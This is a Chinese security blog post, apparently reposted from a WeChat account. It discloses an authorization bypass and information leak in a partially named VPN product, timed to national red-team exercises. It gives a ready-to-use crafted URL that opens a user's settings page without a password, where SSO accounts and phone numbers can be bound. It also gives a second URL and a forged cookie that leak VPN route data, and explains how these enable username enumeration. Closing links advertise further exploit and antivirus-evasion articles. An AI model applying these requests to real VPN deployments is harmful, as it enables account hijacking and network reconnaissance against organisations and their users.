【前方高能】某捷VPN越权绑定&信息泄露

  • A+
所属分类:安全文章

0x01 简述

HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题

注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个方法进行用户名爆破

话不多说先上图

【前方高能】某捷VPN越权绑定&信息泄露


0x02 越权绑定

首先打开VPN登录页,可以看到是这样子的

【前方高能】某捷VPN越权绑定&信息泄露


直接构造URL:

https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres

USERNAME为已存在的用户名,访问后即可进入到这样一个界面

【前方高能】某捷VPN越权绑定&信息泄露


然后我们点击左侧的“个人设置”

【前方高能】某捷VPN越权绑定&信息泄露


在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号

【前方高能】某捷VPN越权绑定&信息泄露


0x03 信息泄露

直接构造URL:

https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc

注:需要先使用第一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie

Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1


然后再打开的页面,就可以看到他VPN现有的路由信息

【前方高能】某捷VPN越权绑定&信息泄露


同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息

【前方高能】某捷VPN越权绑定&信息泄露


如果用户是不存在的,就不会返回

【前方高能】某捷VPN越权绑定&信息泄露


通过这个方法,可以使用Burp进行用户名爆破

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【前方高能】某捷VPN越权绑定&信息泄露

往期文章有彩蛋哦【前方高能】某捷VPN越权绑定&信息泄露

【前方高能】某捷VPN越权绑定&信息泄露


【前方高能】某捷VPN越权绑定&信息泄露
你点的每个赞,我都认真当成了喜欢

本文始发于微信公众号(渗透Xiao白帽):【前方高能】某捷VPN越权绑定&信息泄露

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: